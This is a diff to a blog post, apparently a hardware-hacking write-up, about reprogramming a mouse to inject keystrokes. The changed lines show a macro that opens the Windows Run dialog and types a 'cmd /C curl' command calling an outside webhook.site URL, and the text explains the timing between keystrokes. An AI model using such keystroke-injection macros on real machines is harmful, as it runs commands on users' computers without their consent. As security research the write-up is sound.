oneinctrl/oneinctrl.github.io/_posts/mousehack/2024-03-20-mousehack.md

-Win + R  # Shortcut to open the Run program cmd /C   # Invoke command prompt and pass a command to it curl https://webhook.site/103ee47d-7ac7-49aa-98ac-e74b4fb2bd02 # The curl call Enter    # to execute
+Win + R  # Shortcut to open the Run program cmd /C   # Invoke command prompt and pass a command to it curl https://webhook.site/103ee47d-7ac7-49aa-98ac-e74b4fb2bd02 # The curl call Enter    # Execute
 {%endhighlight%}

-Once again we can play around with the delay between keystrokes to speed the macro (note the 25ms between invoking "Run" and curl, this is to give enough time to actually open the Run dialog before typing):
+Once again we can play around with the delay between keystrokes to speed up the macro (note the 25ms between invoking "Run" and "cmd", this is done to give enough time to actually open the Run dialog before typing):

 ![](/assets/mousehack/images/curl_macro_optimized.png)